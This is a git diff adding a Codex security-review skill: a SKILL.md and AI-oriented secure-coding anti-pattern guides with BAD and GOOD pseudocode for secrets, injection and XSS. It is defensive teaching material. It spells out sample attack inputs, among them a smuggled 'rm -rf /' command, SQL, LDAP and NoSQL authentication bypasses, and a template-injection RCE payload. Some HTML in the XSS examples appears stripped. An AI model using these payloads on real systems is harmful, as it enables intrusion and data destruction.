constant-time comparison functions +``` + +## Input Validation Testing + +```pseudocode +// Testing Approach +1. 
Boundary Testing: + - Empty strings, null, undefined + - Max length + 1 + - Integer boundaries (MAX_INT, MIN_INT) + - Unicode normalization variants + +2. Type Confusion: + - Array where string expected: ["value"] + - Object where string expected: {"$gt": ""} + - Number where string expected: 12345 + - Boolean where object expected: true + +3. Encoding Bypass: + - URL encoding: %00, %2e%2e%2f + - Unicode: \u0000, \ufeff + - Double encoding: %252e + - Overlong UTF-8 + +4. ReDoS Testing: + - For each regex, test with: (valid_char * 30) + invalid_char + - Measure response time (should be < 100ms) + - Use regex-dos-detector tools + +// Testing Checklist +- [ ] Test all endpoints with null/empty values +- [ ] Test numeric fields with boundary values +- [ ] Test string fields with max length exceeded +- [ ] Test type confusion for all input fields +- [ ] Test regex patterns for ReDoS +- [ ] Verify server-side validation matches client-side +- [ ] Test Unicode normalization issues +``` + +--- + +# Additional Patterns Reference + +This depth document covers the 6 most critical patterns in extensive detail. 
For coverage of additional security anti-patterns, see [[ANTI_PATTERNS_BREADTH]], which includes: + +| Pattern Category | Patterns Covered | +|-----------------|------------------| +| **File System Security** | Path traversal, unsafe file uploads, insecure temp files | +| **Access Control** | Missing authorization checks, IDOR, privilege escalation | +| **Network Security** | SSRF, insecure deserialization, unvalidated redirects | +| **Error Handling** | Information disclosure, stack traces, verbose errors | +| **Logging Security** | Sensitive data in logs, insufficient logging | +| **Concurrency** | Race conditions, TOCTOU, deadlocks | +| **Dependency Security** | Outdated dependencies, slopsquatting, lockfile tampering | +| **Configuration** | Debug mode in production, default credentials | +| **API Security** | Mass assignment, excessive data exposure, rate limiting | + +Use the breadth document for quick reference across many patterns. Use this depth document for comprehensive understanding of the most critical patterns. 
+ +--- + +# External Resources + +## OWASP Resources + +- **OWASP Top 10 (2021):** https://owasp.org/Top10/ +- **OWASP Cheat Sheet Series:** https://cheatsheetseries.owasp.org/ +- **OWASP Testing Guide:** https://owasp.org/www-project-web-security-testing-guide/ +- **OWASP ASVS:** https://owasp.org/www-project-application-security-verification-standard/ + +### Relevant Cheat Sheets + +| Pattern | OWASP Cheat Sheet | +|---------|-------------------| +| Secrets Management | [Secrets Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html) | +| SQL Injection | [Query Parameterization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html) | +| XSS | [XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html) | +| Authentication | [Authentication Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html) | +| Session Management | [Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html) | +| Cryptography | [Cryptographic Storage Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html) | +| Input Validation | [Input Validation Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html) | + +## CWE References + +- **CWE Top 25 (2024):** https://cwe.mitre.org/top25/archive/2024/2024_cwe_top25.html +- **CWE/SANS Top 25:** https://www.sans.org/top25-software-errors/ + +### CWE Mappings for This Document + +| Pattern | Primary CWEs | +|---------|--------------| +| Hardcoded Secrets | CWE-798, CWE-259, CWE-321, CWE-200 | +| SQL Injection | CWE-89, CWE-564 | +| Command Injection | CWE-78, CWE-77 | +| XSS | CWE-79, CWE-80, CWE-83, CWE-87 | +| Authentication | CWE-287, CWE-384, CWE-613, CWE-307 | +| Session Security | CWE-384, CWE-613, CWE-614, 
CWE-1004 | +| Cryptographic Failures | CWE-327, CWE-328, CWE-329, CWE-338, CWE-916 | +| Input Validation | CWE-20, CWE-1333, CWE-185, CWE-176 | + +## AI Code Security Research + +- **Asleep at the Keyboard? (GitHub Copilot Security Analysis):** https://arxiv.org/abs/2108.09293 +- **Stanford Study, Do Users Write More Insecure Code with AI Assistants?:** https://arxiv.org/abs/2211.03622 +- **USENIX Package Hallucination Study (2024):** https://www.usenix.org/conference/usenixsecurity24 +- **Veracode State of Software Security (2024-2025):** https://www.veracode.com/state-of-software-security-report +- **Snyk Developer Security Survey (2024):** https://snyk.io/reports/ + +## Security Testing Tools + +| Tool | Purpose | URL | +|------|---------|-----| +| Semgrep | Static analysis with security rules | https://semgrep.dev | +| CodeQL | GitHub security queries | https://codeql.github.com | +| TruffleHog | Secret scanning | https://github.com/trufflesecurity/trufflehog | +| SQLMap | SQL injection testing | https://sqlmap.org | +| Burp Suite | Web security testing | https://portswigger.net/burp | +| OWASP ZAP | Open source web security scanner | https://www.zaproxy.org | +| jwt_tool | JWT security testing | https://github.com/ticarpi/jwt_tool | +| gitleaks | Git secret scanning | https://github.com/gitleaks/gitleaks | + +--- + +# Document Information + +**Document:** AI Code Security Anti-Patterns: Depth Version +**Version:** 1.0.0 +**Last Updated:** 2026-01-18 +**Patterns Covered:** 6 (Hardcoded Secrets, SQL/Command Injection, XSS, Authentication/Session, Cryptography, Input Validation) + +## Change Log + +| Date | Version | Changes | +|------|---------|---------| +| 2026-01-18 | 1.0.0 | Initial release with 6 comprehensive pattern deep-dives | + +## Related Documents + +- [[ANTI_PATTERNS_BREADTH]] - Quick reference covering 25+ security patterns +- [[Ranking-Matrix]] - Priority scoring methodology and pattern rankings +- [[Pseudocode-Examples]] - Additional code examples for all patterns + +## Contributing + +This document is 
maintained as part of the AI Code Security Anti-Patterns project. Security patterns evolve as new research emerges and AI models change. Contributions welcome for: + +- New edge cases and exploitation techniques +- Updated statistics and research citations +- Additional testing methodologies +- Framework-specific secure coding examples + +--- + +*This document is designed to be included in AI assistant context windows to improve the security of generated code. For maximum effectiveness, include along with [[ANTI_PATTERNS_BREADTH]] when reviewing or generating security-sensitive code.* + +--- + +**END OF DOCUMENT** diff --git a/.codex/skills/sec-context/SKILL.md b/.codex/skills/sec-context/SKILL.md new file mode 100644 index 0000000..f00ab01 --- /dev/null +++ b/.codex/skills/sec-context/SKILL.md @@ -0,0 +1,38 @@ +--- +name: sec-context +description: Use when generating or reviewing code for security risks (auth, input validation, DB queries, file handling, templates, secrets, SSRF/RCE). Applies the sec-context anti-patterns and outputs a checklist + concrete fixes + tests. Do not use for non-code or purely stylistic edits. +--- + +# sec-context skill + +## Goal +Apply the sec-context anti-pattern guidance to code generation and code review so risky patterns are caught early and fixes are concrete. + +## References (read these files when running the skill) +- references/ANTI_PATTERNS_BREADTH.md +- references/ANTI_PATTERNS_DEPTH.md + +## When invoked, do this +1. Identify the risk surfaces in scope (e.g., auth/session, web endpoints, input parsing, DB access, file upload, command execution, templating, dependency choice, serialization). +2. Open `ANTI_PATTERNS_BREADTH.md` and shortlist the relevant anti-pattern checks for those surfaces. +3. For each shortlisted item, open `ANTI_PATTERNS_DEPTH.md` to confirm: + - the exact failure mode + - safe patterns/remediations + - edge cases and common “almost fixed” traps +4. 
Produce outputs in this structure: + +### A) Findings checklist +- For each relevant anti-pattern: PASS/FAIL and 1–2 lines why. + +### B) Fixes +- For each FAIL: propose a specific code change (patch-quality guidance). +- Prefer allowlists, least privilege, safe defaults, and secure error handling/logging. +- Avoid “security theater”; focus on real exploit paths. + +### C) Tests / verification +- Add or recommend tests that would fail before the fix and pass after (including negative cases). +- If applicable, add lint/static-analysis hooks. + +## Guardrails +- Don’t paste long excerpts of the reference docs; summarize and apply. +- Don’t invent requirements; if key context is missing, ask targeted questions. diff --git a/.codex/skills/sec-context/references/ANTI_PATTERNS_BREADTH.md b/.codex/skills/sec-context/references/ANTI_PATTERNS_BREADTH.md new file mode 100644 index 0000000..215304f --- /dev/null +++ b/.codex/skills/sec-context/references/ANTI_PATTERNS_BREADTH.md @@ -0,0 +1,7315 @@ +--- +type: reference +title: AI Code Security Anti-Patterns - Breadth Version +created: 2026-01-18 +version: 1.0.0 +tags: + - security + - anti-patterns + - ai-generated-code + - llm + - secure-coding +related: + - "[[ANTI_PATTERNS_DEPTH]]" + - "[[Ranking-Matrix]]" + - "[[Pseudocode-Examples]]" +--- + +# AI Code Security Anti-Patterns +## Breadth Version - Comprehensive Coverage + +> **Purpose:** Security anti-patterns guide for AI-assisted code generation +> **Audience:** Any LLM system prompt, RAG system, or context file +> **Format:** Pseudocode examples (implement in your target language) +> **How to use:** Include in system prompt or reference during code generation + +--- + +## INSTRUCTIONS FOR AI/LLM + +This document contains security anti-patterns you MUST avoid when generating code. +Each section shows a VULNERABLE pattern (marked BAD) and a SECURE alternative (marked GOOD). 
+All examples are in PSEUDOCODE - implement the secure patterns in whatever language +the developer is using. When in doubt, choose the more secure option. + +**Key Statistics:** +- AI-generated code has an **86% XSS failure rate** (vs 31.6% human code) +- **5-21% of AI-suggested packages don't exist** (slopsquatting risk) +- AI code is **2.74x more likely** to have XSS vulnerabilities +- **21.7% hallucination rate** for package names in some domains +- SQL injection patterns appeared "thousands of times" in AI training data + +**Before generating any code:** +1. Never hardcode credentials, API keys, or secrets +2. Always parameterize database queries +3. Validate and sanitize all user input +4. Use cryptographically secure random for security tokens +5. Verify packages exist before suggesting imports +6. Encode output for the appropriate context (HTML, URL, JS) + +--- + +## Quick Reference Table + +| Pattern | CWE | Severity | Quick Fix | +|---------|-----|----------|-----------| +| Hallucinated Packages | CWE-1357 | Critical | Verify packages exist before import | +| XSS (Reflected/Stored/DOM) | CWE-79 | Critical | Encode output for context | +| Hardcoded Secrets | CWE-798 | Critical | Use environment variables | +| SQL Injection | CWE-89 | Critical | Use parameterized queries | +| Missing Authentication | CWE-287 | Critical | Apply auth to all protected endpoints | +| Command Injection | CWE-78 | Critical | Use argument arrays, avoid shell | +| Missing Input Validation | CWE-20 | High | Validate type, length, format, range | +| Unrestricted File Upload | CWE-434 | Critical | Validate extension, MIME, and size | +| Insufficient Randomness | CWE-330 | High | Use secrets module for tokens | +| Missing Rate Limiting | CWE-770 | High | Implement per-IP/user limits | +| Excessive Data Exposure | CWE-200 | High | Use DTOs with field allowlists | +| Path Traversal | CWE-22 | High | Validate paths within allowed dirs | +| Weak Password Hashing | CWE-327 | High | Use 
bcrypt/argon2 with salt | +| Log Injection | CWE-117 | Medium | Sanitize newlines, use structured logging | +| Debug Mode in Production | CWE-215 | High | Environment-based configuration | +| Weak Encryption | CWE-326 | High | Use AES-GCM or ChaCha20-Poly1305 | +| Session Fixation | CWE-384 | High | Regenerate session ID on login | +| JWT Misuse | CWE-287 | High | Strong secrets, explicit algorithms | +| Mass Assignment | CWE-915 | High | Allowlist assignable fields | +| Missing Security Headers | CWE-16 | Medium | Add CSP, X-Frame-Options, HSTS | +| Open CORS | CWE-346 | Medium | Restrict to known origins | +| LDAP Injection | CWE-90 | High | Escape special LDAP characters | +| XPath Injection | CWE-643 | High | Use parameterized XPath or validate | +| Insecure Temp Files | CWE-377 | Medium | Use mkstemp with restrictive perms | +| Verbose Error Messages | CWE-209 | Medium | Generic external, detailed internal | + +--- + +## 1. Secrets and Credentials Management + +**CWE References:** CWE-798 (Hard-coded Credentials), CWE-259 (Hard-coded Password) +**Severity:** Critical | **Related:** [[Hardcoded-Secrets]] + +> **Risk:** Secrets committed to version control are scraped within minutes. Leads to cloud resource abuse, data breaches, and significant financial costs. AI frequently generates code with embedded credentials from tutorial examples. 
+ +### 1.1 Hardcoded Passwords and API Keys + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Hardcoded API keys and passwords +// ======================================== +CONSTANT API_KEY = "sk-abcd1234efgh5678ijkl9012mnop3456" +CONSTANT DB_PASSWORD = "super_secret_password" +CONSTANT AWS_ACCESS_KEY = "AKIAIOSFODNN7EXAMPLE" +CONSTANT AWS_SECRET_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" + +FUNCTION call_api(endpoint): + headers = {"Authorization": "Bearer " + API_KEY} + RETURN http.get(endpoint, headers) +END FUNCTION + +// ======================================== +// GOOD: Environment variables +// ======================================== +FUNCTION call_api(endpoint): + api_key = environment.get("API_KEY") + + IF api_key IS NULL: + THROW Error("API_KEY environment variable required") + END IF + + headers = {"Authorization": "Bearer " + api_key} + RETURN http.get(endpoint, headers) +END FUNCTION +``` + +### 1.2 Credentials in Configuration Files + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Credentials in config committed to repo +// ======================================== +// config.json (tracked in git) +{ + "database_url": "postgresql://admin:password123@localhost:5432/mydb", + "redis_password": "redis_secret_123", + "smtp_password": "mail_password" +} + +FUNCTION connect_database(): + config = load_json("config.json") + connection = database.connect(config.database_url) + RETURN connection +END FUNCTION + +// ======================================== +// GOOD: External secret management +// ======================================== +// config.json (no secrets, safe to commit) +{ + "database_host": "localhost", + "database_port": 5432, + "database_name": "mydb" +} + +FUNCTION connect_database(): + config = load_json("config.json") + + // Credentials from environment or secret manager + db_user = environment.get("DB_USER") + 
db_password = environment.get("DB_PASSWORD") + + IF db_user IS NULL OR db_password IS NULL: + THROW Error("Database credentials not configured") + END IF + + url = "postgresql://" + db_user + ":" + db_password + "@" + + config.database_host + ":" + config.database_port + "/" + config.database_name + RETURN database.connect(url) +END FUNCTION +``` + +### 1.3 Secrets in Client-Side Code + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Secrets exposed in frontend JavaScript +// ======================================== +// frontend.js (served to browser) +CONSTANT STRIPE_SECRET_KEY = "sk_live_abc123..." // Never expose secret keys! +CONSTANT ADMIN_PASSWORD = "admin123" + +FUNCTION charge_card(card_number, amount): + RETURN http.post("https://api.stripe.com/charges", { + api_key: STRIPE_SECRET_KEY, // Visible in browser DevTools! + card: card_number, + amount: amount + }) +END FUNCTION + +// ======================================== +// GOOD: Backend proxy for sensitive operations +// ======================================== +// frontend.js +FUNCTION charge_card(card_token, amount): + // Only send public token, backend handles secret key + RETURN http.post("/api/charges", { + token: card_token, + amount: amount + }) +END FUNCTION + +// backend.js (server-side only) +FUNCTION handle_charge(request): + stripe_key = environment.get("STRIPE_SECRET_KEY") + + RETURN stripe.charges.create({ + api_key: stripe_key, + source: request.token, + amount: request.amount + }) +END FUNCTION +``` + +### 1.4 Insecure Credential Storage + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Storing credentials in plaintext +// ======================================== +FUNCTION save_user_credentials(username, password): + // Dangerous: Plaintext password storage + database.insert("credentials", { + username: username, + password: password // Stored as-is! 
+ }) +END FUNCTION + +FUNCTION save_api_key(user_id, api_key): + // Dangerous: No encryption + database.insert("api_keys", { + user_id: user_id, + key: api_key + }) +END FUNCTION + +// ======================================== +// GOOD: Proper credential protection +// ======================================== +FUNCTION save_user_credentials(username, password): + // Hash passwords with bcrypt + salt = bcrypt.generate_salt(rounds=12) + password_hash = bcrypt.hash(password, salt) + + database.insert("credentials", { + username: username, + password_hash: password_hash + }) +END FUNCTION + +FUNCTION save_api_key(user_id, api_key): + // Encrypt sensitive data at rest + encryption_key = secret_manager.get("DATA_ENCRYPTION_KEY") + encrypted_key = aes_gcm_encrypt(api_key, encryption_key) + + database.insert("api_keys", { + user_id: user_id, + encrypted_key: encrypted_key + }) +END FUNCTION +``` + +### 1.5 Missing Secret Rotation Considerations + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Static secrets with no rotation capability +// ======================================== +CONSTANT JWT_SECRET = "static_jwt_secret_forever" + +FUNCTION create_token(user_id): + // No way to rotate without breaking all existing tokens + RETURN jwt.encode({user: user_id}, JWT_SECRET, algorithm="HS256") +END FUNCTION + +// ======================================== +// GOOD: Versioned secrets supporting rotation +// ======================================== +FUNCTION get_jwt_secret(version=NULL): + IF version IS NULL: + version = environment.get("JWT_SECRET_VERSION", "v1") + END IF + + // Fetch versioned secret from manager + RETURN secret_manager.get("JWT_SECRET_" + version) +END FUNCTION + +FUNCTION create_token(user_id): + current_version = environment.get("JWT_SECRET_VERSION") + secret = get_jwt_secret(current_version) + + payload = { + user: user_id, + secret_version: current_version, // Include version for validation + 
exp: current_timestamp() + 3600 + } + RETURN jwt.encode(payload, secret, algorithm="HS256") +END FUNCTION + +FUNCTION verify_token(token): + // Read the secret version from the unverified payload; it is used only to select the key + unverified = jwt.decode(token, verify=FALSE) + version = unverified.get("secret_version", "v1") + + // The signature is still verified here with the selected secret + secret = get_jwt_secret(version) + RETURN jwt.decode(token, secret, algorithms=["HS256"]) +END FUNCTION +``` + +--- + +## 2. Injection Vulnerabilities + +**CWE References:** CWE-89 (SQL Injection), CWE-78 (OS Command Injection), CWE-90 (LDAP Injection), CWE-643 (XPath Injection), CWE-943 (NoSQL Injection), CWE-1336 (Template Injection) +**Severity:** Critical | **Related:** [[Injection-Vulnerabilities]] + +> **Risk:** Injection vulnerabilities allow attackers to execute arbitrary code, queries, or commands by manipulating user input. AI models frequently generate vulnerable string concatenation patterns from training data containing millions of insecure examples. Always use parameterized queries and avoid dynamic command construction. 
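As a concrete counterpart to the advice on parameterized queries, here is a minimal Python sketch using the standard-library `sqlite3` module. The `users` table, the `find_user` and `build_demo_db` helpers, and the in-memory database are assumptions made for illustration; they are not part of the skill itself.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Create a throwaway in-memory database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany(
        "INSERT INTO users (username) VALUES (?)",
        [("admin",), ("alice",)],
    )
    return conn


def find_user(conn: sqlite3.Connection, username: str) -> list:
    """Look up a user with a bound parameter instead of string concatenation."""
    # The ? placeholder keeps the value out of the SQL text, so quotes or
    # comment markers in the input are treated as data, not as SQL.
    cursor = conn.execute(
        "SELECT id, username FROM users WHERE username = ?",
        (username,),
    )
    return cursor.fetchall()


conn = build_demo_db()
print(find_user(conn, "admin"))
print(find_user(conn, "admin' OR '1'='1' --"))
```

Because the payload is bound as a value, it is compared literally against the `username` column and matches no row.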
+ +### 2.1 SQL Injection (String Concatenation in Queries) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: String concatenation in SQL queries +// ======================================== +FUNCTION get_user(username): + // Vulnerable: User input directly concatenated + query = "SELECT * FROM users WHERE username = '" + username + "'" + RETURN database.execute(query) +END FUNCTION + +FUNCTION search_products(category, min_price): + // Vulnerable: Multiple injection points + query = "SELECT * FROM products WHERE category = '" + category + + "' AND price > " + min_price + RETURN database.execute(query) +END FUNCTION + +// Attack: username = "admin' OR '1'='1' --" +// Result: SELECT * FROM users WHERE username = 'admin' OR '1'='1' --' +// This bypasses authentication and returns all users + +// ======================================== +// GOOD: Parameterized queries (prepared statements) +// ======================================== +FUNCTION get_user(username): + // Safe: Parameters are escaped automatically + query = "SELECT * FROM users WHERE username = ?" + RETURN database.execute(query, [username]) +END FUNCTION + +FUNCTION search_products(category, min_price): + // Safe: All parameters bound separately + query = "SELECT * FROM products WHERE category = ? AND price > ?" 
+ RETURN database.execute(query, [category, min_price]) +END FUNCTION + +// With named parameters (preferred for clarity) +FUNCTION get_user_named(username): + query = "SELECT * FROM users WHERE username = :username" + RETURN database.execute(query, {username: username}) +END FUNCTION +``` + +### 2.2 Command Injection (Unsanitized Shell Commands) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Shell command with user input +// ======================================== +FUNCTION ping_host(hostname): + // Vulnerable: User controls shell command + command = "ping -c 4 " + hostname + RETURN shell.execute(command) +END FUNCTION + +FUNCTION convert_file(input_path, output_format): + // Vulnerable: Multiple injection points + command = "convert " + input_path + " output." + output_format + RETURN shell.execute(command) +END FUNCTION + +// Attack: hostname = "google.com; rm -rf /" +// Result: ping -c 4 google.com; rm -rf / +// This executes the ping AND deletes the filesystem + +// ======================================== +// GOOD: Use argument arrays, avoid shell +// ======================================== +FUNCTION ping_host(hostname): + // Validate input format first + IF NOT is_valid_hostname(hostname): + THROW Error("Invalid hostname format") + END IF + + // Safe: Arguments passed as array, no shell interpolation + RETURN process.execute(["ping", "-c", "4", hostname], shell=FALSE) +END FUNCTION + +FUNCTION convert_file(input_path, output_format): + // Validate allowed formats + allowed_formats = ["png", "jpg", "gif", "webp"] + IF output_format NOT IN allowed_formats: + THROW Error("Invalid output format") + END IF + + // Validate path is within allowed directory + IF NOT path.is_within(input_path, UPLOAD_DIRECTORY): + THROW Error("Invalid file path") + END IF + + output_path = path.join(OUTPUT_DIR, "output." 
+ output_format) + RETURN process.execute(["convert", input_path, output_path], shell=FALSE) +END FUNCTION + +// Helper: Validate hostname format +FUNCTION is_valid_hostname(hostname): + // Only allow alphanumeric, dots, and hyphens + pattern = "^[a-zA-Z0-9][a-zA-Z0-9.-]{0,253}[a-zA-Z0-9]$" + RETURN regex.match(pattern, hostname) +END FUNCTION +``` + +### 2.3 LDAP Injection + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unescaped LDAP filters +// ======================================== +FUNCTION find_user_by_name(username): + // Vulnerable: User input in LDAP filter + filter = "(uid=" + username + ")" + RETURN ldap.search("ou=users,dc=example,dc=com", filter) +END FUNCTION + +FUNCTION authenticate_ldap(username, password): + // Vulnerable: Both fields injectable + filter = "(&(uid=" + username + ")(userPassword=" + password + "))" + results = ldap.search(BASE_DN, filter) + RETURN results.count > 0 +END FUNCTION + +// Attack: username = "*)(uid=*))(|(uid=*" +// Result: (uid=*)(uid=*))(|(uid=*) +// This can return all users or bypass authentication + +// ======================================== +// GOOD: Escape LDAP special characters +// ======================================== +FUNCTION escape_ldap(input): + // Escape LDAP special characters: * ( ) \ NUL + result = input + result = result.replace("\\", "\\5c") // Backslash first + result = result.replace("*", "\\2a") + result = result.replace("(", "\\28") + result = result.replace(")", "\\29") + result = result.replace("\0", "\\00") + RETURN result +END FUNCTION + +FUNCTION find_user_by_name(username): + // Safe: Input is escaped before use + safe_username = escape_ldap(username) + filter = "(uid=" + safe_username + ")" + RETURN ldap.search("ou=users,dc=example,dc=com", filter) +END FUNCTION + +FUNCTION authenticate_ldap(username, password): + // Better: Use LDAP bind for authentication instead of filter + user_dn = "uid=" + escape_ldap(username) + 
",ou=users,dc=example,dc=com" + + TRY: + connection = ldap.bind(user_dn, password) + connection.close() + RETURN TRUE + CATCH LDAPError: + RETURN FALSE + END TRY +END FUNCTION +``` + +### 2.4 XPath Injection + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unescaped XPath queries +// ======================================== +FUNCTION find_user_xml(username): + // Vulnerable: User input in XPath expression + xpath = "//users/user[name='" + username + "']" + RETURN xml_document.query(xpath) +END FUNCTION + +FUNCTION authenticate_xml(username, password): + // Vulnerable: Both fields injectable + xpath = "//users/user[name='" + username + "' and password='" + password + "']" + result = xml_document.query(xpath) + RETURN result IS NOT EMPTY +END FUNCTION + +// Attack: username = "admin' or '1'='1" +// Result: //users/user[name='admin' or '1'='1'] +// This returns all users, bypassing authentication + +// ======================================== +// GOOD: Parameterized XPath or strict validation +// ======================================== +// Option 1: Use parameterized XPath (if supported) +FUNCTION find_user_xml(username): + xpath = "//users/user[name=$username]" + RETURN xml_document.query(xpath, {username: username}) +END FUNCTION + +// Option 2: Escape XPath special characters +FUNCTION escape_xpath(input): + // Handle quotes by splitting and concatenating + IF input.contains("'") AND input.contains('"'): + // Use concat() for strings with both quote types + parts = input.split("'") + escaped = "concat('" + parts.join("',\"'\",'" ) + "')" + RETURN escaped + ELSE IF input.contains("'"): + RETURN '"' + input + '"' + ELSE: + RETURN "'" + input + "'" + END IF +END FUNCTION + +FUNCTION find_user_xml_escaped(username): + // Validate input format first + IF NOT is_valid_username(username): + THROW Error("Invalid username format") + END IF + + safe_username = escape_xpath(username) + xpath = 
"//users/user[name=" + safe_username + "]" + RETURN xml_document.query(xpath) +END FUNCTION + +// Option 3: Strict whitelist validation +FUNCTION is_valid_username(username): + // Only allow alphanumeric and limited special chars + pattern = "^[a-zA-Z0-9_.-]{1,64}$" + RETURN regex.match(pattern, username) +END FUNCTION +``` + +### 2.5 NoSQL Injection + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unvalidated input in NoSQL queries +// ======================================== +FUNCTION find_user_nosql(query_params): + // Vulnerable: User can inject operators + // If query_params = {"username": {"$ne": ""}} + // This returns all users where username is not empty + RETURN mongodb.collection("users").find(query_params) +END FUNCTION + +FUNCTION authenticate_nosql(username, password): + // Vulnerable: Accepts objects, not just strings + query = { + username: username, // Could be {"$gt": ""} + password: password // Could be {"$gt": ""} + } + user = mongodb.collection("users").find_one(query) + RETURN user IS NOT NULL +END FUNCTION + +// Attack via JSON body: +// {"username": {"$gt": ""}, "password": {"$gt": ""}} +// This bypasses authentication by matching any non-empty values + +// ======================================== +// GOOD: Type validation and operator blocking +// ======================================== +FUNCTION find_user_nosql(username): + // Validate input is a string, not an object + IF typeof(username) != "string": + THROW Error("Username must be a string") + END IF + + // Safe: Only string values can be queried + RETURN mongodb.collection("users").find_one({username: username}) +END FUNCTION + +FUNCTION authenticate_nosql(username, password): + // Strict type checking + IF typeof(username) != "string" OR typeof(password) != "string": + THROW Error("Invalid credential types") + END IF + + // Additional: Block MongoDB operators + IF username.starts_with("$") OR password.starts_with("$"): + 
THROW Error("Invalid characters in credentials") + END IF + + user = mongodb.collection("users").find_one({username: username}) + + IF user IS NULL: + RETURN FALSE + END IF + + // Compare password hash, not plaintext + RETURN bcrypt.verify(password, user.password_hash) +END FUNCTION + +// Sanitize any object to remove operators +FUNCTION sanitize_query(obj): + IF typeof(obj) != "object": + RETURN obj + END IF + + sanitized = {} + FOR key, value IN obj: + // Block all MongoDB operators + IF key.starts_with("$"): + CONTINUE // Skip operator keys + END IF + + IF typeof(value) == "object": + // Recursively sanitize, but block nested operators + IF has_operator_keys(value): + THROW Error("Query operators not allowed") + END IF + END IF + + sanitized[key] = value + END FOR + RETURN sanitized +END FUNCTION +``` + +### 2.6 Template Injection (SSTI) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: User input in template strings +// ======================================== +FUNCTION render_greeting(username): + // Vulnerable: User input treated as template code + template_string = "Hello, " + username + "!" 
+ RETURN template_engine.render_string(template_string) +END FUNCTION + +FUNCTION render_email(user_template, user_data): + // Dangerous: User-provided template + RETURN template_engine.render_string(user_template, user_data) +END FUNCTION + +// Attack: username = "{{config.SECRET_KEY}}" +// Result: Template engine evaluates and exposes secret key +// Attack: username = "{{''.__class__.__mro__[1].__subclasses__()}}" +// Result: Can achieve remote code execution in some engines + +// ======================================== +// GOOD: Use templates as data, not code +// ======================================== +FUNCTION render_greeting(username): + // Safe: User input passed as data to pre-defined template + template = template_engine.load("greeting.html") + RETURN template.render({username: escape_html(username)}) +END FUNCTION + +// greeting.html (static, not user-provided): +//

Hello, {{ username }}!

+ +FUNCTION render_email_safe(template_name, user_data): + // Safe: Only allow pre-defined templates + allowed_templates = ["welcome", "reset_password", "notification"] + + IF template_name NOT IN allowed_templates: + THROW Error("Invalid template name") + END IF + + // Sanitize all user data + safe_data = {} + FOR key, value IN user_data: + safe_data[key] = escape_html(string(value)) + END FOR + + template = template_engine.load(template_name + ".html") + RETURN template.render(safe_data) +END FUNCTION + +// For user-customizable content, use a safe subset +FUNCTION render_user_content(content, context): + // Use a sandboxed/logic-less template engine + // or plain text with variable substitution only + // context: server-side map of variable names to values + allowed_vars = ["name", "date", "product"] + + result = content + FOR var_name IN allowed_vars: + placeholder = "{{" + var_name + "}}" + IF var_name IN context: + result = result.replace(placeholder, escape_html(context[var_name])) + END IF + END FOR + + // Remove any remaining template syntax + result = regex.replace(result, "\{\{.*?\}\}", "") + + RETURN result +END FUNCTION +``` + +--- + +## 3. Cross-Site Scripting (XSS) + +**CWE References:** CWE-79 (Improper Neutralization of Input During Web Page Generation), CWE-80 (Improper Neutralization of Script-Related HTML Tags) +**Severity:** Critical | **Related:** [[XSS-Vulnerabilities]] + +> **Risk:** XSS has the **highest failure rate (86%)** in AI-generated code. AI models are 2.74x more likely to produce XSS-vulnerable code than human developers. XSS enables session hijacking, account takeover, and data theft. AI frequently generates direct string concatenation into HTML without encoding. 
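To make the encoding point concrete, the following is a small Python sketch built on the standard-library `html.escape` function. The `render_search_heading` helper and the `<h1>` wrapper are hypothetical names chosen for illustration, and the sketch covers only the HTML body context, not JavaScript, URL, or CSS contexts.

```python
from html import escape


def render_search_heading(query: str) -> str:
    """Build an HTML fragment with the user-supplied query encoded."""
    # escape() rewrites &, < and >, and with quote=True (the default)
    # also " and ', so the value cannot open a tag or close an attribute.
    return "<h1>Search results for: " + escape(query) + "</h1>"


payload = "<script>alert(document.cookie)</script>"
print(render_search_heading(payload))
```

The encoded payload is displayed as text by the browser instead of being parsed as a script element.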
+ +### 3.1 Reflected XSS (Echoing User Input) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: User input directly echoed in response +// ======================================== +FUNCTION handle_search(request): + query = request.get_parameter("q") + + // Vulnerable: User input inserted directly into HTML + html = "

Search results for: " + query + "

" + html += "

No results found.

" + RETURN html_response(html) +END FUNCTION + +FUNCTION display_error(error_message): + // Vulnerable: Error parameter reflected without encoding + RETURN "
" + error_message + "
" +END FUNCTION + +// Attack: /search?q= +// Result: Script executes in victim's browser, stealing their session + +// ======================================== +// GOOD: HTML-encode all user input before rendering +// ======================================== +FUNCTION handle_search(request): + query = request.get_parameter("q") + + // Safe: HTML-encode user input + safe_query = html_encode(query) + + html = "

Search results for: " + safe_query + "

" + html += "

No results found.

" + RETURN html_response(html) +END FUNCTION + +FUNCTION display_error(error_message): + // Safe: Encode before inserting into HTML + RETURN "
" + html_encode(error_message) + "
